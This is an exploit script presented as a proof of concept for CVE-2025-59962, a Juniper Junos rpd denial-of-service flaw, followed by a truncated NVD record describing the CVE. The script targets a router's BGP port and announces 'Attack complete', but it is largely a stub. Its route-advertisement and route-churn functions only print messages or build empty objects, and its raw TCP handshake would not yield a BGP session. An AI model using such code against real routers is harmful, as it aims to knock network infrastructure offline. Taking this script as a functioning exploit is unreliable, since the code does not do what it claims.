CVE-2025-59962

#!/usr/bin/env python3 """ CVE-2025-59962 - Juniper Junos OS rpd Uninitialized Pointer DoS PoC This PoC demonstrates the concept of triggering BGP indirect next-hop re-resolution to cause rpd crash via uninitialized pointer access. Note: This requires: 1. Adjacent network access to the target Juniper device 2. BGP sharding enabled on the target 3. BGP session established with the target 4. Indirect next-hop routes configured """ import time import random from scapy.all import IP, TCP, BGP, send, sr1 TARGET_IP = "192.168.1.1" # Target Juniper device BGP_PORT = 179 LOCAL_AS = 65001 TARGET_AS = 65000 def establish_bgp_session(): """Establish BGP session with the target router""" # TCP three-way handshake syn = IP(dst=TARGET_IP) / TCP(dport=BGP_PORT, sport=random.randint(1024, 65535), flags="S") syn_ack = sr1(syn, timeout=5) if syn_ack: ack = IP(dst=TARGET_IP) / TCP(dport=BGP_PORT, sport=syn_ack[TCP].dport, seq=syn_ack[TCP].ack + 1, ack=syn_ack[TCP].seq + 1, flags="A") send(ack) print("[+] TCP session established") return True return False def advertise_indirect_nexthop(): """Advertise BGP routes with indirect next-hop""" # Advertise routes that will require IGP-based next-hop resolution bgp_update = BGP() # BGP UPDATE message with NLRI pointing to indirect next-hop print("[+] Advertising BGP routes with indirect next-hop") # In real scenario, use ExaBGP or similar tool to send BGP updates return True def trigger_igp_route_churn(): """Trigger IGP route changes to cause BGP re-resolution""" print("[*] Triggering IGP route churn to force BGP re-resolution...") for i in range(100): # Send OSPF LSA updates or IS-IS LSPs to cause route changes # This forces rpd to re-resolve indirect next-hops print(f"[*] Route churn iteration {i+1}/100") time.sleep(0.1) # Random timing to hit the uninitialized pointer window def main(): print("=" * 60) print("CVE-2025-59962 PoC - Juniper rpd DoS") print("=" * 60) if not establish_bgp_session(): print("[-] Failed to establish BGP session") return if not advertise_indirect_nexthop(): print("[-] Failed to advertise routes") return print("[+] Waiting for BGP convergence...") time.sleep(30) trigger_igp_route_churn() print("[+] Attack complete - check if rpd has crashed") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-59962", "sourceIdentifier": "[email protected]", "published": "2025-10-09T16:15:46.247", "lastModified": "2026-01-23T18:36:28.293", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Access of Uninitialized Pointer vulnerability in the routing protocol daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved with BGP sharding configured allows an attacker triggering indirect next-hop updates, along with timing outside the attacker's control, to cause rpd to crash and restart, leading to a Denial of Service (DoS).\n\nWith BGP sharding enabled, triggering route resolution of an indirect next-hop (e.g., an IGP route change over which a BGP route gets resolved), may cause rpd to crash and restart. An attacker causing continuous IGP route churn, resulting in repeated route re-resolution, will increase the likelihood of triggering this issue, leading to a potentially extended DoS condition.\n\nThis issue affects:\n\nJunos OS:\n\n\n\n * all versions before 21.4R3-S6, \n * from 22.1 before 22.1R3-S6, \n * from 22.2 before 22.2R3-S3, \n * from 22.3 before 22.3R3-S3, \n * from 22.4 before 22.4R3, \n * from 23.2 before 23.2R2; \n\n\n\n\nJunos OS Evolved: \n\n\n\n * all versions before 22.3R3-S3-EVO, \n * from 22.4 before 22.4R3-EVO, \n * from 23.2 before 23.2R2-EVO.\n\n\n\n\nVersions before Junos OS 21.3R1 and Junos OS Evolved 21.3R1-EVO are unaffected by this issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:A/V:C/RE:M/U:X", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "AUTOMATIC", "valueDensity": "CONCENTRATED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-824"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:*", "versionEndExcluding": "21.4", "matchCriteriaId": "AA5E63CF-31E5-4391-896F-148F05DA6BFE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:21.4:-:*:*:*:*:*:*", "matchCriteriaId": "79ED3CE8-CC57-43AB-9A26-BBC87816062D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:21.4:r1:*:*:*:*:*:*", "matchCriteriaId": "4310D2D9-A8A6-48F8-9384-0A0692A1E1C3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:21.4:r1-s1:*:*:*:*:*:*", "matchCriteriaId": "9962B01C-C57C-4359-9532-676AB81CE8B0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:21.4:r1-s2:*:*:*:*:*:*", "matchCriteriaId": "62178549-B679-4902-BFDB-2993803B7FCE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:21.4:r2:*:*:*:*:*:*", "matchCriteriaId": "9AD697DF-9738-4276-94ED-7B9380CD09F5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:21.4:r2-s1:*:*:*:*:*:*", "matchCriteriaId": "09FF5818-0803-4646-A386-D7C645EE58A3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:21.4:r2-s2:*:*:*:*:*:*", "matchCriteriaId": "2229FA59-EB24-49A2-85CE-F529A8DE6BA7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:21.4:r3:*:*:*:*:*:*", "matchCriteriaId": "0CB280D8-C5D8-4B51-A879-496ACCDE4538 ... (truncated)